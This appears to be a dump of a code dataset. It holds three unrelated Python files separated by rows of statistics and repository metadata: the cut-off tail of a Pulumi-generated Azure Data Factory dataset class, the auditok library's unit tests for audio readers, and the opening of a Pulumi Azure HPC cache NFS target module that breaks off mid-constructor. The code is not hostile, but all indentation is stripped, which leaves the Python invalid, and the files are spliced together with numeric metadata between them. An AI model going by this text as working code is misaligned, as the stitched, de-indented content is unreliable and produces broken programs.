def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter(name="useEncryptedEndpoints")
def use_encrypted_endpoints(self) -> Optional[Any]:
"""
Specifies whether the data source endpoints are encrypted using HTTPS. The default value is true.
"""
return pulumi.get(self, "use_encrypted_endpoints")
@use_encrypted_endpoints.setter
def use_encrypted_endpoints(self, value: Optional[Any]):
pulumi.set(self, "use_encrypted_endpoints", value)
@property
@pulumi.getter(name="useHostVerification")
def use_host_verification(self) -> Optional[Any]:
"""
Specifies whether to require the host name in the server's certificate to match the host name of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_host_verification")
@use_host_verification.setter
def use_host_verification(self, value: Optional[Any]):
pulumi.set(self, "use_host_verification", value)
@property
@pulumi.getter(name="usePeerVerification")
def use_peer_verification(self) -> Optional[Any]:
"""
Specifies whether to verify the identity of the server when connecting over SSL. The default value is true.
"""
return pulumi.get(self, "use_peer_verification")
@use_peer_verification.setter
def use_peer_verification(self, value: Optional[Any]):
pulumi.set(self, "use_peer_verification", value)
@pulumi.input_type
class ZohoObjectDatasetArgs:
def __init__(__self__, *,
linked_service_name: pulumi.Input['LinkedServiceReferenceArgs'],
type: pulumi.Input[str],
annotations: Optional[pulumi.Input[Sequence[Any]]] = None,
description: Optional[pulumi.Input[str]] = None,
parameters: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]] = None,
structure: Optional[Any] = None):
"""
Zoho server dataset.
:param pulumi.Input['LinkedServiceReferenceArgs'] linked_service_name: Linked service reference.
:param pulumi.Input[str] type: Type of dataset.
:param pulumi.Input[Sequence[Any]] annotations: List of tags that can be used for describing the Dataset.
:param pulumi.Input[str] description: Dataset description.
:param pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]] parameters: Parameters for dataset.
:param Any structure: Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
pulumi.set(__self__, "linked_service_name", linked_service_name)
pulumi.set(__self__, "type", 'ZohoObject')
if annotations is not None:
pulumi.set(__self__, "annotations", annotations)
if description is not None:
pulumi.set(__self__, "description", description)
if parameters is not None:
pulumi.set(__self__, "parameters", parameters)
if structure is not None:
pulumi.set(__self__, "structure", structure)
@property
@pulumi.getter(name="linkedServiceName")
def linked_service_name(self) -> pulumi.Input['LinkedServiceReferenceArgs']:
"""
Linked service reference.
"""
return pulumi.get(self, "linked_service_name")
@linked_service_name.setter
def linked_service_name(self, value: pulumi.Input['LinkedServiceReferenceArgs']):
pulumi.set(self, "linked_service_name", value)
@property
@pulumi.getter
def type(self) -> pulumi.Input[str]:
"""
Type of dataset.
"""
return pulumi.get(self, "type")
@type.setter
def type(self, value: pulumi.Input[str]):
pulumi.set(self, "type", value)
@property
@pulumi.getter
def annotations(self) -> Optional[pulumi.Input[Sequence[Any]]]:
"""
List of tags that can be used for describing the Dataset.
"""
return pulumi.get(self, "annotations")
@annotations.setter
def annotations(self, value: Optional[pulumi.Input[Sequence[Any]]]):
pulumi.set(self, "annotations", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Dataset description.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter
def parameters(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]:
"""
Parameters for dataset.
"""
return pulumi.get(self, "parameters")
@parameters.setter
def parameters(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input['ParameterSpecificationArgs']]]]):
pulumi.set(self, "parameters", value)
@property
@pulumi.getter
def structure(self) -> Optional[Any]:
"""
Columns that define the structure of the dataset. Type: array (or Expression with resultType array), itemType: DatasetDataElement.
"""
return pulumi.get(self, "structure")
@structure.setter
def structure(self, value: Optional[Any]):
pulumi.set(self, "structure", value)
| 42.174649 | 417 | 0.66458 | 101,119 | 926,324 | 5.943878 | 0.012569 | 0.073536 | 0.056322 | 0.041159 | 0.956149 | 0.93658 | 0.923113 | 0.905737 | 0.895483 | 0.886081 | 0 | 0.000689 | 0.228941 | 926,324 | 21,963 | 418 | 42.17657 | 0.840797 | 0.268967 | 0 | 0.854678 | 1 | 0 | 0.152534 | 0.068574 | 0 | 0 | 0 | 0 | 0 | 1 | 0.207517 | false | 0.022357 | 0.000375 | 0 | 0.317728 | 0.00135 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 9 |
a02a49350479f307a1473576e8d2b45ba2315247 | 30,622 | py | Python | tests/test_AudioReader.py | joinee0208/auditok | 4de704d9d60c1997cf62006173e8698906ff67d0 | [
"MIT"
] | 533 | 2015-09-18T22:35:34.000Z | 2022-03-26T15:20:50.000Z | tests/test_AudioReader.py | joinee0208/auditok | 4de704d9d60c1997cf62006173e8698906ff67d0 | [
"MIT"
] | 36 | 2016-04-11T20:11:54.000Z | 2021-12-22T05:07:48.000Z | tests/test_AudioReader.py | joinee0208/auditok | 4de704d9d60c1997cf62006173e8698906ff67d0 | [
"MIT"
] | 97 | 2015-12-07T15:38:00.000Z | 2022-03-24T01:17:28.000Z | """
@author: Amine Sehili <amine.sehili@gmail.com>
September 2015
"""
import unittest
from functools import partial
import sys
import wave
from genty import genty, genty_dataset
from auditok import (
dataset,
ADSFactory,
AudioDataSource,
AudioReader,
Recorder,
BufferAudioSource,
WaveAudioSource,
DuplicateArgument,
)
class TestADSFactoryFileAudioSource(unittest.TestCase):
def setUp(self):
self.audio_source = WaveAudioSource(
filename=dataset.one_to_six_arabic_16000_mono_bc_noise
)
def test_ADS_type(self):
ads = ADSFactory.ads(audio_source=self.audio_source)
err_msg = "wrong type for ads object, expected: 'AudioDataSource', "
err_msg += "found: {0}"
self.assertIsInstance(
ads, AudioDataSource, err_msg.format(type(ads)),
)
def test_default_block_size(self):
ads = ADSFactory.ads(audio_source=self.audio_source)
size = ads.block_size
self.assertEqual(
size,
160,
"Wrong default block_size, expected: 160, found: {0}".format(size),
)
def test_block_size(self):
ads = ADSFactory.ads(audio_source=self.audio_source, block_size=512)
size = ads.block_size
self.assertEqual(
size,
512,
"Wrong block_size, expected: 512, found: {0}".format(size),
)
# with alias keyword
ads = ADSFactory.ads(audio_source=self.audio_source, bs=160)
size = ads.block_size
self.assertEqual(
size,
160,
"Wrong block_size, expected: 160, found: {0}".format(size),
)
def test_block_duration(self):
ads = ADSFactory.ads(
audio_source=self.audio_source, block_dur=0.01
) # 10 ms
size = ads.block_size
self.assertEqual(
size,
160,
"Wrong block_size, expected: 160, found: {0}".format(size),
)
# with alias keyword
ads = ADSFactory.ads(audio_source=self.audio_source, bd=0.025) # 25 ms
size = ads.block_size
self.assertEqual(
size,
400,
"Wrong block_size, expected: 400, found: {0}".format(size),
)
def test_hop_duration(self):
ads = ADSFactory.ads(
audio_source=self.audio_source, block_dur=0.02, hop_dur=0.01
) # 10 ms
size = ads.hop_size
self.assertEqual(
size, 160, "Wrong hop_size, expected: 160, found: {0}".format(size)
)
# with alias keyword
ads = ADSFactory.ads(
audio_source=self.audio_source, bd=0.025, hop_dur=0.015
) # 15 ms
size = ads.hop_size
self.assertEqual(
size,
240,
"Wrong block_size, expected: 240, found: {0}".format(size),
)
def test_sampling_rate(self):
ads = ADSFactory.ads(audio_source=self.audio_source)
srate = ads.sampling_rate
self.assertEqual(
srate,
16000,
"Wrong sampling rate, expected: 16000, found: {0}".format(srate),
)
def test_sample_width(self):
ads = ADSFactory.ads(audio_source=self.audio_source)
swidth = ads.sample_width
self.assertEqual(
swidth,
2,
"Wrong sample width, expected: 2, found: {0}".format(swidth),
)
def test_channels(self):
ads = ADSFactory.ads(audio_source=self.audio_source)
channels = ads.channels
self.assertEqual(
channels,
1,
"Wrong number of channels, expected: 1, found: {0}".format(
channels
),
)
def test_read(self):
ads = ADSFactory.ads(audio_source=self.audio_source, block_size=256)
ads.open()
ads_data = ads.read()
ads.close()
audio_source = WaveAudioSource(
filename=dataset.one_to_six_arabic_16000_mono_bc_noise
)
audio_source.open()
audio_source_data = audio_source.read(256)
audio_source.close()
self.assertEqual(
ads_data, audio_source_data, "Unexpected data read from ads"
)
def test_Limiter_Deco_read(self):
# read a maximum of 0.75 seconds from audio source
ads = ADSFactory.ads(audio_source=self.audio_source, max_time=0.75)
ads_data = []
ads.open()
while True:
block = ads.read()
if block is None:
break
ads_data.append(block)
ads.close()
ads_data = b"".join(ads_data)
audio_source = WaveAudioSource(
filename=dataset.one_to_six_arabic_16000_mono_bc_noise
)
audio_source.open()
audio_source_data = audio_source.read(int(16000 * 0.75))
audio_source.close()
self.assertEqual(
ads_data, audio_source_data, "Unexpected data read from LimiterADS"
)
def test_Limiter_Deco_read_limit(self):
# read a maximum of 1.191 seconds from audio source
ads = ADSFactory.ads(audio_source=self.audio_source, max_time=1.191)
total_samples = round(ads.sampling_rate * 1.191)
nb_full_blocks, last_block_size = divmod(total_samples, ads.block_size)
total_samples_with_overlap = (
nb_full_blocks * ads.block_size + last_block_size
)
expected_read_bytes = (
total_samples_with_overlap * ads.sw * ads.channels
)
total_read = 0
ads.open()
i = 0
while True:
block = ads.read()
if block is None:
break
i += 1
total_read += len(block)
ads.close()
err_msg = "Wrong data length read from LimiterADS, expected: {0}, "
err_msg += "found: {1}"
self.assertEqual(
total_read,
expected_read_bytes,
err_msg.format(expected_read_bytes, total_read),
)
def test_Recorder_Deco_read(self):
ads = ADSFactory.ads(
audio_source=self.audio_source, record=True, block_size=500
)
ads_data = []
ads.open()
for i in range(10):
block = ads.read()
if block is None:
break
ads_data.append(block)
ads.close()
ads_data = b"".join(ads_data)
audio_source = WaveAudioSource(
filename=dataset.one_to_six_arabic_16000_mono_bc_noise
)
audio_source.open()
audio_source_data = audio_source.read(500 * 10)
audio_source.close()
self.assertEqual(
ads_data,
audio_source_data,
"Unexpected data read from RecorderADS",
)
def test_Recorder_Deco_is_rewindable(self):
ads = ADSFactory.ads(audio_source=self.audio_source, record=True)
self.assertTrue(
ads.rewindable, "RecorderADS.is_rewindable should return True"
)
def test_Recorder_Deco_rewind_and_read(self):
ads = ADSFactory.ads(
audio_source=self.audio_source, record=True, block_size=320
)
ads.open()
for i in range(10):
ads.read()
ads.rewind()
# read all available data after rewind
ads_data = []
while True:
block = ads.read()
if block is None:
break
ads_data.append(block)
ads.close()
ads_data = b"".join(ads_data)
audio_source = WaveAudioSource(
filename=dataset.one_to_six_arabic_16000_mono_bc_noise
)
audio_source.open()
audio_source_data = audio_source.read(320 * 10)
audio_source.close()
self.assertEqual(
ads_data,
audio_source_data,
"Unexpected data read from RecorderADS",
)
def test_Overlap_Deco_read(self):
# Use arbitrary valid block_size and hop_size
block_size = 1714
hop_size = 313
ads = ADSFactory.ads(
audio_source=self.audio_source,
block_size=block_size,
hop_size=hop_size,
)
# Read all available data overlapping blocks
ads.open()
ads_data = []
while True:
block = ads.read()
if block is None:
break
ads_data.append(block)
ads.close()
# Read all data from file and build a BufferAudioSource
fp = wave.open(dataset.one_to_six_arabic_16000_mono_bc_noise, "r")
wave_data = fp.readframes(fp.getnframes())
fp.close()
audio_source = BufferAudioSource(
wave_data, ads.sampling_rate, ads.sample_width, ads.channels
)
audio_source.open()
# Compare all blocks read from OverlapADS to those read
# from an audio source with a manual position setting
for i, block in enumerate(ads_data):
tmp = audio_source.read(block_size)
self.assertEqual(
block,
tmp,
"Unexpected block (N={0}) read from OverlapADS".format(i),
)
audio_source.position = (i + 1) * hop_size
audio_source.close()
def test_Limiter_Overlap_Deco_read(self):
block_size = 256
hop_size = 200
ads = ADSFactory.ads(
audio_source=self.audio_source,
max_time=0.50,
block_size=block_size,
hop_size=hop_size,
)
# Read all available data overlapping blocks
ads.open()
ads_data = []
while True:
block = ads.read()
if block is None:
break
ads_data.append(block)
ads.close()
# Read all data from file and build a BufferAudioSource
fp = wave.open(dataset.one_to_six_arabic_16000_mono_bc_noise, "r")
wave_data = fp.readframes(fp.getnframes())
fp.close()
audio_source = BufferAudioSource(
wave_data, ads.sampling_rate, ads.sample_width, ads.channels
)
audio_source.open()
# Compare all blocks read from OverlapADS to those read
# from an audio source with a manual position setting
for i, block in enumerate(ads_data):
tmp = audio_source.read(len(block) // (ads.sw * ads.ch))
self.assertEqual(
len(block),
len(tmp),
"Unexpected block (N={0}) read from OverlapADS".format(i),
)
audio_source.position = (i + 1) * hop_size
audio_source.close()
def test_Limiter_Overlap_Deco_read_limit(self):
block_size = 313
hop_size = 207
ads = ADSFactory.ads(
audio_source=self.audio_source,
max_time=1.932,
block_size=block_size,
hop_size=hop_size,
)
total_samples = round(ads.sampling_rate * 1.932)
first_read_size = block_size
next_read_size = block_size - hop_size
nb_next_blocks, last_block_size = divmod(
(total_samples - first_read_size), next_read_size
)
total_samples_with_overlap = (
first_read_size + next_read_size * nb_next_blocks + last_block_size
)
expected_read_bytes = (
total_samples_with_overlap * ads.sw * ads.channels
)
cache_size = (block_size - hop_size) * ads.sample_width * ads.channels
total_read = cache_size
ads.open()
i = 0
while True:
block = ads.read()
if block is None:
break
i += 1
total_read += len(block) - cache_size
ads.close()
err_msg = "Wrong data length read from LimiterADS, expected: {0}, "
err_msg += "found: {1}"
self.assertEqual(
total_read,
expected_read_bytes,
err_msg.format(expected_read_bytes, total_read),
)
def test_Recorder_Overlap_Deco_is_rewindable(self):
ads = ADSFactory.ads(
audio_source=self.audio_source,
block_size=320,
hop_size=160,
record=True,
)
self.assertTrue(
ads.rewindable, "RecorderADS.is_rewindable should return True"
)
def test_Recorder_Overlap_Deco_rewind_and_read(self):
# Use arbitrary valid block_size and hop_size
block_size = 1600
hop_size = 400
ads = ADSFactory.ads(
audio_source=self.audio_source,
block_size=block_size,
hop_size=hop_size,
record=True,
)
# Read all available data overlapping blocks
ads.open()
i = 0
while True:
block = ads.read()
if block is None:
break
i += 1
ads.rewind()
# Read all data from file and build a BufferAudioSource
fp = wave.open(dataset.one_to_six_arabic_16000_mono_bc_noise, "r")
wave_data = fp.readframes(fp.getnframes())
fp.close()
audio_source = BufferAudioSource(
wave_data, ads.sampling_rate, ads.sample_width, ads.channels
)
audio_source.open()
# Compare all blocks read from OverlapADS to those read
# from an audio source with a manual position setting
for j in range(i):
tmp = audio_source.read(block_size)
self.assertEqual(
ads.read(),
tmp,
"Unexpected block (N={0}) read from OverlapADS".format(i),
)
audio_source.position = (j + 1) * hop_size
ads.close()
audio_source.close()
def test_Limiter_Recorder_Overlap_Deco_rewind_and_read(self):
# Use arbitrary valid block_size and hop_size
block_size = 1600
hop_size = 400
ads = ADSFactory.ads(
audio_source=self.audio_source,
max_time=1.50,
block_size=block_size,
hop_size=hop_size,
record=True,
)
# Read all available data overlapping blocks
ads.open()
i = 0
while True:
block = ads.read()
if block is None:
break
i += 1
ads.rewind()
# Read all data from file and build a BufferAudioSource
fp = wave.open(dataset.one_to_six_arabic_16000_mono_bc_noise, "r")
wave_data = fp.readframes(fp.getnframes())
fp.close()
audio_source = BufferAudioSource(
wave_data, ads.sampling_rate, ads.sample_width, ads.channels
)
audio_source.open()
# Compare all blocks read from OverlapADS to those read
# from an audio source with a manual position setting
for j in range(i):
tmp = audio_source.read(block_size)
self.assertEqual(
ads.read(),
tmp,
"Unexpected block (N={0}) read from OverlapADS".format(i),
)
audio_source.position = (j + 1) * hop_size
ads.close()
audio_source.close()
def test_Limiter_Recorder_Overlap_Deco_rewind_and_read_limit(self):
# Use arbitrary valid block_size and hop_size
block_size = 1000
hop_size = 200
ads = ADSFactory.ads(
audio_source=self.audio_source,
max_time=1.317,
block_size=block_size,
hop_size=hop_size,
record=True,
)
total_samples = round(ads.sampling_rate * 1.317)
first_read_size = block_size
next_read_size = block_size - hop_size
nb_next_blocks, last_block_size = divmod(
(total_samples - first_read_size), next_read_size
)
total_samples_with_overlap = (
first_read_size + next_read_size * nb_next_blocks + last_block_size
)
expected_read_bytes = (
total_samples_with_overlap * ads.sw * ads.channels
)
cache_size = (block_size - hop_size) * ads.sample_width * ads.channels
total_read = cache_size
ads.open()
i = 0
while True:
block = ads.read()
if block is None:
break
i += 1
total_read += len(block) - cache_size
ads.close()
err_msg = "Wrong data length read from LimiterADS, expected: {0}, "
err_msg += "found: {1}"
self.assertEqual(
total_read,
expected_read_bytes,
err_msg.format(expected_read_bytes, total_read),
)
class TestADSFactoryBufferAudioSource(unittest.TestCase):
def setUp(self):
self.signal = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
self.ads = ADSFactory.ads(
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
block_size=4,
)
def test_ADS_BAS_sampling_rate(self):
srate = self.ads.sampling_rate
self.assertEqual(
srate,
16,
"Wrong sampling rate, expected: 16000, found: {0}".format(srate),
)
def test_ADS_BAS_sample_width(self):
swidth = self.ads.sample_width
self.assertEqual(
swidth,
2,
"Wrong sample width, expected: 2, found: {0}".format(swidth),
)
def test_ADS_BAS_channels(self):
channels = self.ads.channels
self.assertEqual(
channels,
1,
"Wrong number of channels, expected: 1, found: {0}".format(
channels
),
)
def test_Limiter_Recorder_Overlap_Deco_rewind_and_read(self):
# Use arbitrary valid block_size and hop_size
block_size = 5
hop_size = 4
ads = ADSFactory.ads(
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
max_time=0.80,
block_size=block_size,
hop_size=hop_size,
record=True,
)
# Read all available data overlapping blocks
ads.open()
i = 0
while True:
block = ads.read()
if block is None:
break
i += 1
ads.rewind()
# Build a BufferAudioSource
audio_source = BufferAudioSource(
self.signal, ads.sampling_rate, ads.sample_width, ads.channels
)
audio_source.open()
# Compare all blocks read from OverlapADS to those read
# from an audio source with a manual position setting
for j in range(i):
tmp = audio_source.read(block_size)
block = ads.read()
self.assertEqual(
block,
tmp,
"Unexpected block '{}' (N={}) read from OverlapADS".format(
block, i
),
)
audio_source.position = (j + 1) * hop_size
ads.close()
audio_source.close()
class TestADSFactoryAlias(unittest.TestCase):
def setUp(self):
self.signal = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ012345"
def test_sampling_rate_alias(self):
ads = ADSFactory.ads(
data_buffer=self.signal,
sr=16,
sample_width=2,
channels=1,
block_dur=0.5,
)
srate = ads.sampling_rate
self.assertEqual(
srate,
16,
"Wrong sampling rate, expected: 16000, found: {0}".format(srate),
)
def test_sampling_rate_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sr=16,
sampling_rate=16,
sample_width=2,
channels=1,
)
self.assertRaises(DuplicateArgument, func)
def test_sample_width_alias(self):
ads = ADSFactory.ads(
data_buffer=self.signal,
sampling_rate=16,
sw=2,
channels=1,
block_dur=0.5,
)
swidth = ads.sample_width
self.assertEqual(
swidth,
2,
"Wrong sample width, expected: 2, found: {0}".format(swidth),
)
def test_sample_width_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sw=2,
sample_width=2,
channels=1,
)
self.assertRaises(DuplicateArgument, func)
def test_channels_alias(self):
ads = ADSFactory.ads(
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
ch=1,
block_dur=4,
)
channels = ads.channels
self.assertEqual(
channels,
1,
"Wrong number of channels, expected: 1, found: {0}".format(
channels
),
)
def test_channels_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
ch=1,
channels=1,
)
self.assertRaises(DuplicateArgument, func)
def test_block_size_alias(self):
ads = ADSFactory.ads(
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
bs=8,
)
size = ads.block_size
self.assertEqual(
size,
8,
"Wrong block_size using bs alias, expected: 8, found: {0}".format(
size
),
)
def test_block_size_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
bs=4,
block_size=4,
)
self.assertRaises(DuplicateArgument, func)
def test_block_duration_alias(self):
ads = ADSFactory.ads(
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
bd=0.75,
)
# 0.75 ms = 0.75 * 16 = 12
size = ads.block_size
err_msg = "Wrong block_size set with a block_dur alias 'bd', "
err_msg += "expected: 8, found: {0}"
self.assertEqual(
size, 12, err_msg.format(size),
)
def test_block_duration_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
bd=4,
block_dur=4,
)
self.assertRaises(DuplicateArgument, func)
def test_block_size_duration_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
bd=4,
bs=12,
)
self.assertRaises(DuplicateArgument, func)
def test_hop_duration_alias(self):
ads = ADSFactory.ads(
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
bd=0.75,
hd=0.5,
)
size = ads.hop_size
self.assertEqual(
size,
8,
"Wrong block_size using bs alias, expected: 8, found: {0}".format(
size
),
)
def test_hop_duration_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
bd=0.75,
hd=0.5,
hop_dur=0.5,
)
self.assertRaises(DuplicateArgument, func)
def test_hop_size_duration_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
bs=8,
hs=4,
hd=1,
)
self.assertRaises(DuplicateArgument, func)
def test_hop_size_greater_than_block_size(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
bs=4,
hs=8,
)
self.assertRaises(ValueError, func)
def test_filename_duplicate(self):
func = partial(
ADSFactory.ads,
fn=dataset.one_to_six_arabic_16000_mono_bc_noise,
filename=dataset.one_to_six_arabic_16000_mono_bc_noise,
)
self.assertRaises(DuplicateArgument, func)
def test_data_buffer_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
db=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
)
self.assertRaises(DuplicateArgument, func)
def test_max_time_alias(self):
ads = ADSFactory.ads(
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
mt=10,
block_dur=0.5,
)
self.assertEqual(
ads.max_read,
10,
"Wrong AudioDataSource.max_read, expected: 10, found: {}".format(
ads.max_read
),
)
def test_max_time_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
mt=True,
max_time=True,
)
self.assertRaises(DuplicateArgument, func)
def test_record_alias(self):
ads = ADSFactory.ads(
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
rec=True,
block_dur=0.5,
)
self.assertTrue(
ads.rewindable, "AudioDataSource.rewindable expected to be True"
)
def test_record_duplicate(self):
func = partial(
ADSFactory.ads,
data_buffer=self.signal,
sampling_rate=16,
sample_width=2,
channels=1,
rec=True,
record=True,
)
self.assertRaises(DuplicateArgument, func)
def test_Limiter_Recorder_Overlap_Deco_rewind_and_read_alias(self):
# Use arbitrary valid block_size and hop_size
block_size = 5
hop_size = 4
ads = ADSFactory.ads(
db=self.signal,
sr=16,
sw=2,
ch=1,
mt=0.80,
bs=block_size,
hs=hop_size,
rec=True,
)
# Read all available data overlapping blocks
ads.open()
i = 0
while True:
block = ads.read()
if block is None:
break
i += 1
ads.rewind()
# Build a BufferAudioSource
audio_source = BufferAudioSource(
self.signal, ads.sampling_rate, ads.sample_width, ads.channels
)
audio_source.open()
# Compare all blocks read from AudioDataSource to those read
# from an audio source with manual position definition
for j in range(i):
tmp = audio_source.read(block_size)
block = ads.read()
self.assertEqual(
block,
tmp,
"Unexpected block (N={0}) read from OverlapADS".format(i),
)
audio_source.position = (j + 1) * hop_size
ads.close()
audio_source.close()
def _read_all_data(reader):
blocks = []
while True:
data = reader.read()
if data is None:
break
blocks.append(data)
return b"".join(blocks)
@genty
class TestAudioReader(unittest.TestCase):
# TODO move all tests here when backward compatibility
# with ADSFactory is dropped
@genty_dataset(
mono=("mono_400", 0.5, 16000),
multichannel=("3channel_400-800-1600", 0.5, 16000 * 3),
)
def test_Limiter(self, file_id, max_read, size):
input_wav = "tests/data/test_16KHZ_{}Hz.wav".format(file_id)
input_raw = "tests/data/test_16KHZ_{}Hz.raw".format(file_id)
with open(input_raw, "rb") as fp:
expected = fp.read(size)
reader = AudioReader(input_wav, block_dur=0.1, max_read=max_read)
reader.open()
data = _read_all_data(reader)
reader.close()
self.assertEqual(data, expected)
@genty_dataset(mono=("mono_400",), multichannel=("3channel_400-800-1600",))
def test_Recorder(self, file_id):
input_wav = "tests/data/test_16KHZ_{}Hz.wav".format(file_id)
input_raw = "tests/data/test_16KHZ_{}Hz.raw".format(file_id)
with open(input_raw, "rb") as fp:
expected = fp.read()
reader = AudioReader(input_wav, block_dur=0.1, record=True)
reader.open()
data = _read_all_data(reader)
self.assertEqual(data, expected)
# rewind many times
for _ in range(3):
reader.rewind()
data = _read_all_data(reader)
self.assertEqual(data, expected)
self.assertEqual(data, reader.data)
reader.close()
@genty_dataset(mono=("mono_400",), multichannel=("3channel_400-800-1600",))
def test_Recorder_alias(self, file_id):
input_wav = "tests/data/test_16KHZ_{}Hz.wav".format(file_id)
input_raw = "tests/data/test_16KHZ_{}Hz.raw".format(file_id)
with open(input_raw, "rb") as fp:
expected = fp.read()
reader = Recorder(input_wav, block_dur=0.1)
reader.open()
data = _read_all_data(reader)
self.assertEqual(data, expected)
# rewind many times
for _ in range(3):
reader.rewind()
data = _read_all_data(reader)
self.assertEqual(data, expected)
self.assertEqual(data, reader.data)
reader.close()
if __name__ == "__main__":
unittest.main()
| 28.353704 | 79 | 0.553034 | 3,443 | 30,622 | 4.684287 | 0.067964 | 0.075707 | 0.034722 | 0.03125 | 0.867684 | 0.854787 | 0.843378 | 0.81157 | 0.777344 | 0.74628 | 0 | 0.030673 | 0.361211 | 30,622 | 1,079 | 80 | 28.379981 | 0.793824 | 0.060479 | 0 | 0.701373 | 0 | 0 | 0.073963 | 0.014208 | 0 | 0 | 0 | 0.000927 | 0.065217 | 1 | 0.061785 | false | 0 | 0.006865 | 0 | 0.074371 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a0604eae2b8b9f26be5ed79b4139f2ea07760dc9 | 24,709 | py | Python | sdk/python/pulumi_azure/hpc/cache_blob_nfs_target.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 109 | 2018-06-18T00:19:44.000Z | 2022-02-20T05:32:57.000Z | sdk/python/pulumi_azure/hpc/cache_blob_nfs_target.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 663 | 2018-06-18T21:08:46.000Z | 2022-03-31T20:10:11.000Z | sdk/python/pulumi_azure/hpc/cache_blob_nfs_target.py | henriktao/pulumi-azure | f1cbcf100b42b916da36d8fe28be3a159abaf022 | [
"ECL-2.0",
"Apache-2.0"
] | 41 | 2018-07-19T22:37:38.000Z | 2022-03-14T10:56:26.000Z | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['CacheBlobNfsTargetArgs', 'CacheBlobNfsTarget']
@pulumi.input_type
class CacheBlobNfsTargetArgs:
def __init__(__self__, *,
cache_name: pulumi.Input[str],
namespace_path: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
storage_container_id: pulumi.Input[str],
usage_model: pulumi.Input[str],
access_policy_name: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a CacheBlobNfsTarget resource.
:param pulumi.Input[str] cache_name: The name of the HPC Cache, which the HPC Cache Blob NFS Target will be added to. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] namespace_path: The client-facing file path of the HPC Cache Blob NFS Target.
:param pulumi.Input[str] resource_group_name: The name of the Resource Group where the HPC Cache Blob NFS Target should exist. Changing this forces a new HPC Cache Blob NFS Target to be created.
:param pulumi.Input[str] storage_container_id: The Resource Manager ID of the Storage Container used as the HPC Cache Blob NFS Target. Changing this forces a new resource to be created.
:param pulumi.Input[str] usage_model: The type of usage of the HPC Cache Blob NFS Target. Possible values are: `READ_HEAVY_INFREQ`, `READ_HEAVY_CHECK_180`, `WRITE_WORKLOAD_15`, `WRITE_AROUND`, `WRITE_WORKLOAD_CHECK_30`, `WRITE_WORKLOAD_CHECK_60` and `WRITE_WORKLOAD_CLOUDWS`.
:param pulumi.Input[str] access_policy_name: The name of the access policy applied to this target. Defaults to `default`.
:param pulumi.Input[str] name: The name which should be used for this HPC Cache Blob NFS Target. Changing this forces a new HPC Cache Blob NFS Target to be created.
"""
pulumi.set(__self__, "cache_name", cache_name)
pulumi.set(__self__, "namespace_path", namespace_path)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "storage_container_id", storage_container_id)
